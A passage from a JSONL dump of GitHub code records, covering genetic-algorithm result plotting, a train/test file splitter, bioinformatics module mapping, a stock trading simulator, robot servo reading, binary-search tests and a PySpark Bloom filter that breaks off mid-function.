for i in range(3):\n # p300_multi.distribute(100, reservoir.wells()[i], plate.columns()[i])\n\n # loop of 12\n for i in range(12):\n p300_multi.distribute(100, reservoir.wells()[i], plate.columns()[i])\n\n # loop of 8\n # for i in range(8):\n # p20_multi.distribute(1, reservoir.wells()[i], plate.columns()[i])","repo_name":"zahmeeth/LDRD-SDL-ANL_Git","sub_path":"446_multi_20_nest_batch_1_E.coli.py","file_name":"446_multi_20_nest_batch_1_E.coli.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34446171679","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\ndef group_merge(group_name: str):\n \"\"\"\n Merges all .csv under the same group name into a pd.DataFrame\n\n :param group_name: group name of the files to be merged\n :return: Returns a df with all fitness values of an experiment group\n \"\"\"\n files = []\n for i in range(10):\n f_name = group_name + f'_{i+1}.csv'\n files.append(pd.read_csv(f_name, header=None))\n return pd.concat(files, axis=0)\n\n\nif __name__ == '__main__':\n # SELECTION COMPARISON PLOT\n selection_fps = group_merge('selection_test_fps')\n selection_fps.reset_index(inplace=True)\n selection_fps.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n selection_fps['generation'] = selection_fps['generation'].apply(lambda x: x + 1)\n selection_fps['selection'] = 'fps'\n\n selection_ranking = group_merge('selection_test_ranking')\n selection_ranking.reset_index(inplace=True)\n selection_ranking.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n selection_ranking['generation'] = selection_ranking['generation'].apply(lambda x: x + 1)\n selection_ranking['selection'] = 'ranking'\n\n selection_tournament = group_merge('selection_test_tournament')\n selection_tournament.reset_index(inplace=True)\n selection_tournament.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n selection_tournament['generation'] = selection_tournament['generation'].apply(lambda x: x + 1)\n selection_tournament['selection'] = 'tournament'\n\n df_selection = pd.concat([selection_fps, selection_ranking, selection_tournament])\n df_selection.sort_values(by='generation', inplace=True)\n df_selection.reset_index(drop=True, inplace=True)\n\n sns.lineplot(x='generation', y='fitness', hue='selection', palette='viridis', data=df_selection)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 101, 10))\n plt.ylabel('Best Fitness')\n plt.yticks(range(0, 101, 10))\n plt.legend().set_title(None)\n plt.show()\n\n # CROSSOVER COMPARISON PLOT\n crossover_opco = group_merge('crossover_test_tournament_opco')\n crossover_opco.reset_index(inplace=True)\n crossover_opco.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n crossover_opco['generation'] = crossover_opco['generation'].apply(lambda x: x + 1)\n crossover_opco['crossover'] = 'opco'\n\n crossover_tpco = selection_tournament.copy()\n crossover_tpco['selection'] = crossover_tpco['selection'].apply(lambda x: 'tpco')\n crossover_tpco.rename(columns={'selection': 'crossover'}, inplace=True)\n\n crossover_f_co = group_merge('crossover_test_tournament_f_co')\n crossover_f_co.reset_index(inplace=True)\n crossover_f_co.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n crossover_f_co['generation'] = crossover_f_co['generation'].apply(lambda x: x + 1)\n crossover_f_co['crossover'] = 'f_co'\n\n df_crossover = pd.concat([crossover_opco, crossover_tpco, crossover_f_co])\n df_crossover.sort_values(by='generation', inplace=True)\n df_crossover.reset_index(drop=True, inplace=True)\n\n sns.lineplot(x='generation', y='fitness', hue='crossover', palette='viridis', data=df_crossover)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 101, 10))\n plt.ylabel('Best Fitness')\n plt.yticks(range(0, 66, 5))\n plt.legend().set_title(None)\n plt.show()\n\n # MUTATION COMPARISON PLOT\n mutation_2pm = group_merge('mutation_test_tournament_2pm')\n mutation_2pm.reset_index(inplace=True)\n mutation_2pm.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n mutation_2pm['generation'] = mutation_2pm['generation'].apply(lambda x: x + 1)\n mutation_2pm['mutation'] = '2pm'\n\n mutation_3pm = group_merge('mutation_test_tournament_3pm')\n mutation_3pm.reset_index(inplace=True)\n mutation_3pm.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n mutation_3pm['generation'] = mutation_3pm['generation'].apply(lambda x: x + 1)\n mutation_3pm['mutation'] = '3pm'\n\n mutation_swap = group_merge('mutation_test_tournament_swap')\n mutation_swap.reset_index(inplace=True)\n mutation_swap.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n mutation_swap['generation'] = mutation_swap['generation'].apply(lambda x: x + 1)\n mutation_swap['mutation'] = 'swap'\n\n mutation_2swap = group_merge('mutation_test_tournament_2swap')\n mutation_2swap.reset_index(inplace=True)\n mutation_2swap.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n mutation_2swap['generation'] = mutation_2swap['generation'].apply(lambda x: x + 1)\n mutation_2swap['mutation'] = '2swap'\n\n mutation_inner_swap = group_merge('mutation_test_tournament_inner_swap')\n mutation_inner_swap.reset_index(inplace=True)\n mutation_inner_swap.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n mutation_inner_swap['generation'] = mutation_inner_swap['generation'].apply(lambda x: x + 1)\n mutation_inner_swap['mutation'] = 'inner_swap'\n\n mutation_rand_mut = group_merge('mutation_test_tournament_rand_mut')\n mutation_rand_mut.reset_index(inplace=True)\n mutation_rand_mut.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n mutation_rand_mut['generation'] = mutation_rand_mut['generation'].apply(lambda x: x + 1)\n mutation_rand_mut['mutation'] = 'rand_mut'\n\n df_mutation = pd.concat([mutation_2pm, mutation_3pm, mutation_swap, mutation_2swap, mutation_inner_swap, mutation_rand_mut])\n df_mutation.sort_values(by='generation', inplace=True)\n df_mutation.reset_index(drop=True, inplace=True)\n\n sns.lineplot(x='generation', y='fitness', hue='mutation', palette='viridis', data=df_mutation)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 101, 10))\n plt.ylabel('Best Fitness')\n plt.yticks(range(0, 66, 5))\n plt.legend().set_title(None)\n plt.show()\n\n # EASY PUZZLE COMPARISON PLOT\n easy_opco = group_merge('easy_test_opco')\n easy_opco.reset_index(inplace=True)\n easy_opco.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n easy_opco['generation'] = easy_opco['generation'].apply(lambda x: x + 1)\n easy_opco['crossover'] = 'opco'\n\n easy_tpco = group_merge('easy_test_tpco')\n easy_tpco.reset_index(inplace=True)\n easy_tpco.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n easy_tpco['generation'] = easy_tpco['generation'].apply(lambda x: x + 1)\n easy_tpco['crossover'] = 'tpco'\n\n easy_f_co = group_merge('easy_test_f_co')\n easy_f_co.reset_index(inplace=True)\n easy_f_co.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n easy_f_co['generation'] = easy_f_co['generation'].apply(lambda x: x + 1)\n easy_f_co['crossover'] = 'f_co'\n\n easy_opco_rand_mut = group_merge('easy_test_opco_rand_mut')\n easy_opco_rand_mut.reset_index(inplace=True)\n easy_opco_rand_mut.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n easy_opco_rand_mut['generation'] = easy_opco_rand_mut['generation'].apply(lambda x: x + 1)\n easy_opco_rand_mut['crossover'] = 'opco + rand_mut'\n\n df_easy = pd.concat([easy_opco, easy_tpco, easy_f_co, easy_opco_rand_mut])\n df_easy.sort_values(by='generation', inplace=True)\n df_easy.reset_index(drop=True, inplace=True)\n df_easy['fitness'] = df_easy['fitness'].apply(lambda x: str(x).split(';;;;')[0]).astype('int')\n\n sns.lineplot(x='generation', y='fitness', hue='crossover', palette='viridis', data=df_easy)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 101, 10))\n plt.ylabel('Best Fitness')\n plt.yticks(range(0, 51, 5))\n plt.axhline(y=0.0, color='black', linestyle='dotted')\n plt.legend().set_title(None)\n plt.show()\n\n # VERY HARD PUZZLE PLOTS\n # fitness crossover\n very_hard_opco = group_merge('very_hard_test_opco')\n very_hard_opco.reset_index(inplace=True)\n very_hard_opco.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n very_hard_opco['generation'] = very_hard_opco['generation'].apply(lambda x: x + 1)\n very_hard_opco['crossover'] = 'opco'\n df_very_hard_opco = very_hard_opco.copy()\n df_very_hard_opco.sort_values(by='generation', inplace=True)\n df_very_hard_opco.reset_index(drop=True, inplace=True)\n\n sns.lineplot(x='generation', y='fitness', palette='viridis', data=df_very_hard_opco)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 201, 20))\n plt.ylabel('Best Fitness')\n plt.yticks(range(0, 61, 5))\n plt.axhline(y=15.0, color='black', linestyle='dotted')\n plt.show()\n\n # average fitness function\n very_hard_avg = group_merge('very_hard_test_opco_avg')\n very_hard_avg.reset_index(inplace=True)\n very_hard_avg.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n very_hard_avg['generation'] = very_hard_avg['generation'].apply(lambda x: x + 1)\n very_hard_avg['function'] = 'avg'\n df_very_hard_avg = very_hard_avg.copy()\n df_very_hard_avg.sort_values(by='generation', inplace=True)\n df_very_hard_avg.reset_index(drop=True, inplace=True)\n\n sns.lineplot(x='generation', y='fitness', palette='viridis', data=df_very_hard_avg)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 201, 20))\n plt.ylabel('Average Best Fitness')\n plt.yticks(range(0, 21, 2))\n plt.axhline(y=4.0, color='black', linestyle='dotted')\n plt.show()\n\n # final attempt\n very_hard = group_merge('very_hard_test_opco_avg_500')\n very_hard.reset_index(inplace=True)\n very_hard.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n very_hard['generation'] = very_hard['generation'].apply(lambda x: x + 1)\n very_hard['function'] = 'avg'\n df_very_hard = very_hard.copy()\n df_very_hard.sort_values(by='generation', inplace=True)\n df_very_hard.reset_index(drop=True, inplace=True)\n\n sns.lineplot(x='generation', y='fitness', palette='viridis', data=df_very_hard)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 501, 50))\n plt.ylabel('Average Best Fitness')\n plt.yticks(range(0, 21, 2))\n plt.axhline(y=1.0, color='black', linestyle='dotted')\n plt.show()\n","repo_name":"migbernardo/cifo_project","sub_path":"results/stats_analysis.py","file_name":"stats_analysis.py","file_ext":"py","file_size_in_byte":10456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14420434313","text":"import json\nimport math\n\nPORCENTAJE_DE_TEST = 0.1\n\n\ndef crear_archivos_de_entrenamiento_y_test_desde(nombre_archivo):\n archivo = open('datos/%s.json' % nombre_archivo)\n datos_txt = json.load(archivo)\n archivo.close()\n\n mensajes_totales = len(datos_txt)\n indice_de_corte = int(math.floor(mensajes_totales * (1.0 - PORCENTAJE_DE_TEST)))\n parte_de_entrenamiento = datos_txt[:indice_de_corte]\n parte_de_test = datos_txt[indice_de_corte:]\n\n file_entrenamiento = open('datos/%s_entrenamiento.json' % nombre_archivo, 'w')\n json.dump(parte_de_entrenamiento, file_entrenamiento)\n file_entrenamiento.close()\n\n file_test = open('datos/%s_test.json' % nombre_archivo, 'w')\n json.dump(parte_de_test, file_test)\n file_test.close()\n\nif __name__ == \"__main__\":\n crear_archivos_de_entrenamiento_y_test_desde('ham_dev')\n crear_archivos_de_entrenamiento_y_test_desde('spam_dev')\n","repo_name":"martinrey/machine-learning","sub_path":"tp1/cortar_archivos_json.py","file_name":"cortar_archivos_json.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34498448969","text":"#!/bin/python3\n\nimport argparse\nfrom pathlib import Path\n\n\n#==============================================================================\n# Read files\n#==============================================================================\n\ndef read_csv(csv_fn) -> dict:\n \"\"\" \n Read csv file \n format : gene,ppi_gain,ppi_lost,mod_gain,mod_lost\n return dict \n {gene : ppi_gain, ppi_lost, mod_gain, mod_lost}\n \"\"\"\n dict_gene_association = {}\n with open(csv_fn) as csv_file:\n for line in csv_file:\n if \"gene\" in line:\n continue\n else:\n splited_line = line.replace(\"\\n\",\"\").split(\",\")\n gene = splited_line[0]\n ppi_gain_list = [i.split(\"_\")[1] for i in splited_line[1].split(\"|\") if len(i) > 1]\n ppi_lost_list = [i.split(\"_\")[1] for i in splited_line[2].split(\"|\") if len(i) > 1]\n mod_gain_list = [i for i in splited_line[3].split(\"|\") if len(i) > 1]\n mod_lost_list = [i for i in splited_line[4].split(\"|\") if len(i) > 1]\n dict_gene_association[gene] = [ppi_gain_list, ppi_lost_list, mod_gain_list, mod_lost_list]\n return dict_gene_association\n\ndef co_appeared(dict_gene_association) -> dict:\n \"\"\"\n Filter the gene association dict\n Keep only gene/association where at least 1 module and 1 ppi are gained\n Return subdict with same format\n \"\"\"\n return {\n gene : association \n for gene, association in dict_gene_association.items()\n if len(association[0]) > 0 and len(association[2]) > 0\n }\n\ndef load_domains_from_csv(domains_file) -> dict:\n \"\"\"\n Load the domains coordinates from a csv file\n csv file is : geneName (no node ID), domainsName, start, stop\n Return a dict\n { gene : [ domain_dict list ] }\n A domain of the domain_dict list is :\n { domain_name : [ start, end ]}\n \"\"\"\n # Init the dict\n dict_gene_domainsList = {}\n # Open and read line per line the input csv_file\n with open(domains_file, \"r\") as csv_file:\n # Iterate on csv file\n for line in csv_file:\n # Split the line\n splited_line = line.replace(\"\\n\", \"\").split(\",\")\n g_name, d_name, d_start, d_end = splited_line[0], splited_line[1], splited_line[2], splited_line[3]\n # Get the gene name with node id, from the raw gene name of the csv file (nod node id)\n gene = g_name.split(\"_\")[0]\n # Build the domains dict (1 csv line = 1 domain = 1 dict)\n dict_domain_posList = {f\"{d_name}|{d_start}|{d_end}\" : [d_start, d_end]}\n # Add it to the gene domains list dict\n if gene not in dict_gene_domainsList:\n dict_gene_domainsList[gene] = [dict_domain_posList]\n else:\n dict_gene_domainsList[gene].append(dict_domain_posList)\n # Return the dict\n return dict_gene_domainsList\n\ndef get_fasta_from_file(multi_fasta) -> dict:\n \"\"\"\n Read the multi fasta file\n And parse it to return a protein dict\n \"\"\"\n protein_dict = {}\n sequence = \"\"\n with open(multi_fasta, \"r\") as fasta_file:\n for line in fasta_file:\n t_line = line.replace(\"\\n\",\"\")\n if \">\" in t_line:\n if sequence != \"\":\n protein_dict[header.replace(\">\",\"\")] = sequence\n sequence = \"\"\n header = t_line\n else: sequence += t_line.replace(\"X\",\"A\")\n protein_dict[header.replace(\">\",\"\")] = sequence\n return protein_dict\n\ndef get_fasta_modules(module_dir) -> dict:\n \"\"\"\n Read all fasta of the module fastas directory\n module header e.g. B692|1248|1254|_NP001361725.1_214\n return dict {module : {gene : [start, stop] } }\n \"\"\"\n dict_module_genePos = {}\n for file in Path(module_dir).iterdir():\n if file.suffix == \".fasta\":\n dict_name_seq = get_fasta_from_file(file)\n dict_gene_Mpos = {}\n for header in dict_name_seq:\n gene = header.split(\"_\")[1]\n module = header.split(\"|\")[0]\n start = header.split(\"|\")[1]\n stop = header.split(\"|\")[2]\n dict_gene_Mpos[gene] = [start, stop]\n dict_module_genePos[module] = dict_gene_Mpos\n return dict_module_genePos\n\ndef region_domains_TS(dict_gene_domainsList) -> dict:\n \"\"\"\n Divide gene sequence by \"regions\", here based on domains\n {region : {gene : [start, stop] } }\n \"\"\"\n dict_region_genePos = {}\n for gene, domains_list in dict_gene_domainsList.items():\n for domain_info in domains_list:\n dict_gene_Dpos = {}\n for d, info in domain_info.items():\n domain = d.split(\"|\")[0]\n d_start = d.split(\"|\")[1]\n d_stop = d.split(\"|\")[2]\n dict_gene_Dpos[gene] = [d_start, d_stop] \n dict_region_genePos[domain] = dict_gene_Dpos\n return dict_region_genePos\n\n#==============================================================================\n# Modules by region/domains\n#==============================================================================\n\ndef modules_by_domains(module_list, dict_region_genePos, dict_module_genePos) -> dict:\n \"\"\"\n Associate modules with region they are localised in \n (If a modules, in 2 descendants is present in 2 different regions, we associate it with both)\n Return a dict \n { region : [module list] }\n \"\"\"\n dict_region_moduleList = {region : [] for region in dict_region_genePos}\n for region, gene_Rpos in dict_region_genePos.items():\n # By gene\n for gene, r_pos in gene_Rpos.items():\n r_start, r_stop = r_pos[0], r_pos[1]\n # Check for each module if its in this region\n for module in dict_module_genePos:\n m_info = dict_module_genePos[module]\n if gene in m_info:\n m_pos = dict_module_genePos[module][gene]\n m_start, m_stop = m_pos[0], m_pos[1]\n # If in it, add it to region\n if int(m_stop) >= int(r_start)-50 and int(r_stop)+50 >= int(m_start):\n if module not in dict_region_moduleList[region]:\n dict_region_moduleList[region].append(module)\n return dict_region_moduleList\n \n#==============================================================================\n# Argparse parser\n#==============================================================================\n\ndef parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"csv_file\",\n help = \"csv file containing the gene where modules and PPI co-appeared (format : gene,ppi_gain,ppi_lost,mod_gain,mod_lost, eg; G71_69_70,Q5XPI4_RNF123,,,B335|B1315)\",\n type=str)\n parser.add_argument(\"--domains_csv\",\n help = \"Add an domains csv file, at the format : gene_name, domain_name, start, end\",\n type=str)\n parser.add_argument(\"module_directory\",\n help = \"directory containing fasta file for all our modules\",\n type=str)\n return parser.parse_args()\n\n\n\n#==============================================================================\n# Main\n#==============================================================================\n\ndef main():\n # Get arguments\n args = parser()\n csv_fn = Path(args.csv_file).resolve()\n module_dir = Path(args.module_directory).resolve()\n dict_gene_association = read_csv(csv_fn)\n dict_gene_domainsList = load_domains_from_csv(args.domains_csv) \n dict_module_genePos = get_fasta_modules(module_dir)\n dict_region_genePos = region_domains_TS(dict_gene_domainsList)\n \n \n print(f\"{len(dict_gene_association)} module(s)-PPI(s) associations\")\n dict_gene_association = co_appeared(dict_gene_association)\n print(f\"{len(dict_gene_association)} co-apparitions associations\")\n print(f\"{len([gene for gene in dict_gene_association if gene.startswith('G')])} co-apparitions associations at ancestral gene node\")\n \n\n\n # Count \n ppi_list = []\n for gene, coapp in dict_gene_association.items():\n if gene.startswith(\"G\"):\n for ppi in coapp[0]:\n if ppi not in ppi_list:\n ppi_list.append(ppi)\n print(f\"\\t{len(ppi_list)} PPI associated with module signatures\")\n mod_list = []\n for gene, coapp in dict_gene_association.items():\n if gene.startswith(\"G\"):\n for mod in coapp[2]:\n if mod not in mod_list:\n mod_list.append(mod)\n print(f\"\\t{len(mod_list)} modules present in these module signatures\")\n \n print(mod_list)\n dict_region_moduleList = modules_by_domains(mod_list, dict_region_genePos, dict_module_genePos)\n for r, ml in dict_region_moduleList.items():\n print(r, len(ml), ml)\n \n # Select ancestral\n dict_gene_association = {gene : assoc for gene, assoc in dict_gene_association.items() if gene.startswith(\"G\")}\n \n \n \n \nif __name__ == \"__main__\":\n main()","repo_name":"OcMalde/PhyloCharMod_publ","sub_path":"phylocharmod/modules_repartition.py","file_name":"modules_repartition.py","file_ext":"py","file_size_in_byte":9173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8621246228","text":"\n\nimport os\nfrom summarizer import Summarizer\ntext = open(f\"{os.getcwd()}/data/Chapter05/nlphistory.txt\").read()\n\nmodel = Summarizer()\n\nprint(\"Without Coreference:\")\nresult = model(text, min_length=200,ratio=0.01)\nfull = ''.join(result)\nprint(full)\n\n\n# print(\"With Coreference:\")\n# # handler = CoreferenceHandler(greedyness=.35)\n\n# model = Summarizer(sentence_handler=handler)\n# result = model(text, min_length=200,ratio=0.01)\n# full = ''.join(result)\n# print(full)","repo_name":"teresagarcia/PracticalNLP","sub_path":"Chapter07/03_p4_TextSummarization_BERT.py","file_name":"03_p4_TextSummarization_BERT.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15725732686","text":"from multiprocessing import cpu_count\nimport configs.logging\nimport configs.plexdictionary\n\nusers_db = 'configs/users.json'\n\nversion = '0.0.19'\napp_name = 'malproxy'\ndebug_mode = False\nport = 8181\n\n# GUnicorn configs\nworkers = cpu_count() * 2 + 1\nbind = \"0.0.0.0:\" + str(port)\n","repo_name":"Morsomnium/malproxy","sub_path":"configs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32701222479","text":"# import getpass\n\ndef binary_search_rotation(lo, hi, condition):\n while lo <= hi:\n mid = (lo+hi) // 2\n result = condition(mid)\n if result == 'found':\n return mid\n elif result == 'left':\n hi = mid - 1\n elif result == 'right':\n lo = mid + 1\n return -1\n\ndef count_rotations_generic(nums):\n hi = len(nums)-1\n lo = 0\n def condition(mid):\n nonlocal hi\n nonlocal lo\n # print(mid)\n # print(nums)\n \n # print(\"in here\")\n if mid > 0 and nums[mid] < nums[mid-1]:\n return \"found\"\n elif mid > 0 and nums[mid] >= nums[mid-1]:\n if nums[mid] < nums[hi]:\n hi = mid - 1\n return \"left\"\n else:\n lo = mid +1 \n return \"right\"\n else:\n hi = mid - 1\n return \"left\"\n\n return binary_search_rotation(0,len(nums)-1,condition)\n\n\ndef evaluate_test_case(test_function, tests):\n num = 0\n passed = 0\n failed = 0\n for test in tests:\n print(test['input']['nums'])\n \n if test['output'] == test_function(test['input']['nums']):\n print(f'##### Test Case {num} #####')\n print('STATUS: PASSED')\n \n passed +=1\n else:\n print(f'##### Test Case {num} #####')\n print('STATUS: FAILED')\n failed += 1\n print(\"Expected Output: \",test['output'])\n print(\"Output: \",test_function(test['input']['nums']),\"\\n \\n \\n\")\n num += 1\n \n return f'*******Test Result*******\\n Total:{num}\\n Passed:{passed}\\n Failed:{failed}'\n\n\n\n\ntest0 = {\n 'input': {\n 'nums': [19, 25, 29, 3, 5, 6, 7, 9, 11, 14]\n },\n 'output': 3\n}\n\n# A list of size 8 rotated 5 times.\ntest1 = {\n 'input': {\n 'nums': [4,5,6,7,8,1,2,3]\n },\n 'output': 5\n}\n# A list that wasn't rotated at all.\ntest2 = {\n 'input': {\n 'nums': [10,12,45,50,100,550,1234,2000]\n },\n 'output': -1\n}\n\n# A list that was rotated just once.\ntest3 = {\n 'input': {\n 'nums': [2000, 20,45,64,355,503,708]\n },\n 'output': 1\n}\n\n# A list that was rotated n-1 times, where n is the size of the list.\ntest4 = {\n 'input': {\n 'nums': [20,42,52,56,345,635,823,5634,6452,4]\n },\n 'output': 9\n}\n# A list that was rotated n times, where n is the size of the list\ntest5 = {\n 'input': {\n 'nums': [23,42,43,45,62,66,72,76,86,132]\n },\n 'output': -1\n}\n# An empty list.\ntest6 = {\n 'input': {\n 'nums': []\n },\n 'output': -1\n}\n# A list containing just one element.\ntest7 = {\n 'input': {\n 'nums': [4]\n },\n 'output': -1\n}\n\ntest8={\n 'input': {\n 'nums': [14,20,4,5,6,6,6,7,7,8,10]\n },\n 'output': 2\n}\ntest9 = {\n 'input': {\n 'nums': [14,20,4,5,6,6,7,7,8,10]\n },\n 'output': 2\n}\n\ntest10 = {\n 'input': {\n 'nums': [20,20,20,1,2,5,7,13,19]\n },\n 'output': 3\n}\n\ntest11 = {\n 'input': {\n 'nums': [20,20]\n },\n 'output': -1\n}\n\ntest12 = {\n 'input': {\n 'nums': [40,51,1,3,6,9,14,18,20,20]\n },\n 'output': 2\n}\n\n\ntests = [test0, test1, test2,test3, test4, test5, test6, test7, test8,test9, test10,test11, test12]\n#Irrelevant\n# if __name__ == '__main__':\n# print('Initiating program')\n# password = getpass.getpass(prompt=\"Enter Your Password \\n\")\n\n# if password == 'ceejay':\n# print(\"Access Granted\")\n# print(evaluate_test_case(count_rotations_generic, tests))\n# else:\n# print('Wrong Credentials')","repo_name":"shady-cj/Py-algo","sub_path":"testbinarySearch.py","file_name":"testbinarySearch.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13418299108","text":"import pandas as pd\nfrom math import floor\n\nfrom constants import SIMULATION_MONEY\nfrom constants import STOP_LOSS\nfrom constants import DELTA_ORIGIN\nfrom constants import PER_TRADE_AMT\n\nclass trader:\n money = 0\n buyLimited = False #true if can't buy stock due to inadequate funds\n lossesStopped = 0\n wins = 0\n losses = 0\n totalTrades = 0\n\n def __init__(self):\n self.money = SIMULATION_MONEY\n\n def trade(self, buyDataRow, sellDataRow):\n #check funds\n if buyDataRow[DELTA_ORIGIN] > self.money:\n self.buyLimited = True\n return\n #buy turn\n sharesAmt = floor(PER_TRADE_AMT / buyDataRow[DELTA_ORIGIN])\n boughtShares = 0\n while sharesAmt > 0 and self.money >= buyDataRow[DELTA_ORIGIN] :\n self.money -= buyDataRow[DELTA_ORIGIN]\n sharesAmt -= 1\n boughtShares += 1\n if boughtShares == 0:\n return\n #stop loss turn\n if DELTA_ORIGIN == \"\" and buyDataRow[\"\"] <= buyDataRow[DELTA_ORIGIN] * (1 - (STOP_LOSS / 100)):\n self.money -= buyDataRow[DELTA_ORIGIN] * 1 - (STOP_LOSS / 100)\n self.lossesStopped += 1\n self.losses += 1\n self.totalTrades += 1\n return\n if DELTA_ORIGIN == \"\" and sellDataRow[\"\"] <= sellDataRow[DELTA_ORIGIN] * (1 - (STOP_LOSS / 100)):\n self.money -= sellDataRow[DELTA_ORIGIN] * 1 - (STOP_LOSS / 100)\n self.lossesStopped += 1\n self.losses += 1\n self.totalTrades += 1\n return\n #sell turn\n self.money += sellDataRow[DELTA_ORIGIN] * boughtShares\n #logging\n if buyDataRow[DELTA_ORIGIN] < sellDataRow[DELTA_ORIGIN]:\n self.wins += 1\n elif buyDataRow[DELTA_ORIGIN] > sellDataRow[DELTA_ORIGIN]:\n self.losses += 1\n self.totalTrades += 1\n\n def getWinRate(self):\n return round((self.wins / self.totalTrades) * 100, 2)\n","repo_name":"Tom-Lieber/stockmoves","sub_path":"trader.py","file_name":"trader.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72612523608","text":"# -*- coding: utf-8 -*-\nfrom functools import wraps\nfrom interface.helpers.logger import ConsoleLogger as Log\n\n\ndef wrapper(method):\n @wraps(method)\n def method_wrapper(*args, **kwargs):\n try:\n rsp, error, message, http_code = method(*args, **kwargs)\n except Exception as e:\n rsp = []\n error = e.__class__.__name__\n message = e.__str__()\n http_code = 500\n Log().output(e)\n finally:\n return rsp, error, message, http_code\n return method_wrapper\n","repo_name":"dev-lusaja/python-boilerplate","sub_path":"app/interface/rest/decorators/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"3058310180","text":"from robot_parts.legs import *\nimport time\nimport os\n\nservo.connect()\n\n# initialize legs and servos\nleg_count = 4\nlegs = []\nfor i in range(leg_count):\n\tn = i * 2 + i + 1\n\tlegs.append(leg(n, n+1, n+2))\n\tlegs[i].a.torqueOff()\n\tlegs[i].b.torqueOff()\n\tlegs[i].c.torqueOff()\n\ntry:\n\twhile True:\n\t\tos.system(\"clear\")\n\t\tfor i in range(leg_count):\n\t\t\tprint(f\"({legs[i].a.getAngle()}, {legs[i].b.getAngle()}, {legs[i].c.getAngle()})\")\n\t\ttime.sleep(0.5)\nexcept KeyboardInterrupt:\n\tprint(\"Ctrl + C pressed...\")\n\nservo.close()\n","repo_name":"Robot-Builders-Team-University-of-Idaho/Quad_Walker_Bot","sub_path":"src/read_angles.py","file_name":"read_angles.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72288533847","text":"from pyspark import SparkContext, SparkConf\nimport json\nimport random\nimport sys\nimport time\nfrom binascii import hexlify\n\nstartTime = time.time()\n\nconf = SparkConf().setMaster(\"local[*]\").set(\"spark.executor.memory\", \"4g\").set(\"spark.driver.memory\", \"4g\")\nsc = SparkContext(conf=conf)\n\ninput_file_path_first = sys.argv[1] #r'business_first.json'\ninput_file_path_second = sys.argv[2] # r'business_second.json'\noutput_file_path = sys.argv[3] #r'task1_output.csv'\n\ncity_int = (sc.textFile(input_file_path_first) # read file\n .map(lambda line:json.loads(line)) # convert each line to json object\n .map(lambda jLine:jLine['city']) # keep only the city field\n .filter(lambda city:len(city)!=0) # filter out the empty city\n .map(lambda cityStr:int(hexlify(cityStr.encode('utf8')), 16)) # convert city string to an integer\n .distinct() # remove duplicate city\n .collect()\n )\n\ndef makePrediction(city):\n if len(city) == 0:\n return 0\n else:\n cityStr = int(hexlify(city.encode('utf8')), 16)\n return predict(cityStr)\n\ndef predict(cityInt):\n if all(calculateHashedValue(a, b, len_bit_array, cityInt) in bloom_filter for a, b in zip(a_list, b_list)):\n return 1\n else:\n return 0\n\ndef calculateHashedValue(a, b, m, x):\n return (a * x + b) % m\n\ndef generateHashFunc(num_func):\n param_a_list = random.sample(range(1, sys.maxsize - 1), num_func)\n param_b_list = random.sample(range(0, sys.maxsize - 1), num_func)\n \n return param_a_list, param_b_list\n\ndef buildBloomFilter(city_int_list, len_bit_array, param_a_list, param_b_list):\n # bloom filter is not actually a list full of 0's and 1's, instead is represented as a set of indices\n # if there is an 1 in pos i, then add i to the set. If a pos is not in the set, then it's a 0\n bloom_filter = set() \n \n param_m = len_bit_array \n for city_int in city_int_list:\n for param_a, param_b in zip(param_a_list, param_b_list):\n hashed = calculateHashedValue(param_a, param_b, param_m, city_int)\n 